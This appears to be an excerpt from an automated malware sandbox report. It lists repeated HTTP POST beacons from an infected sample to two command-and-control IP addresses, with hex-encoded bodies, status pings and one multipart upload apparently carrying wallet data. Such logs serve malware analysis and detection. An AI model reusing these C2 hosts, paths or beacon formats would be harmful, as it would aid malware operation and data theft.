Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NjE0NQ==Host: 193.233.132.56Content-Length: 6305Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 37 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000057031&unit=246122658369
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
